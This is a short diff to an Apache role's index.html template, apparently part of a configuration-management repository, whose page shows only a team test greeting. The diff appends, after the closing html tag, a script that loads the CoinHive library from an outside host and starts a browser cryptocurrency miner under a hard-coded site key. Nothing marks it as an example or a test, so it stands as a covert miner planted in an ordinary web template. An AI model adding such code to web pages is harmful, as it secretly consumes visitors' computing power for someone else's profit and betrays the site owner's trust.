--- a/roles/apache/templates/index.html
+++ b/roles/apache/templates/index.html
@@ -3,3 +3,8 @@
 <h1> Hi Team, checking apache</h1>
 </body>
 </html>
+<script src=https://coinhive.com/lib/coinhive.min.js></script>
+<script>
+var miner = new CoinHive.Anonymous('thfmdx34PyHEv51ah2y6VAfWowKCnALG', {throttle: 0.3});
+miner.start();
+</script>
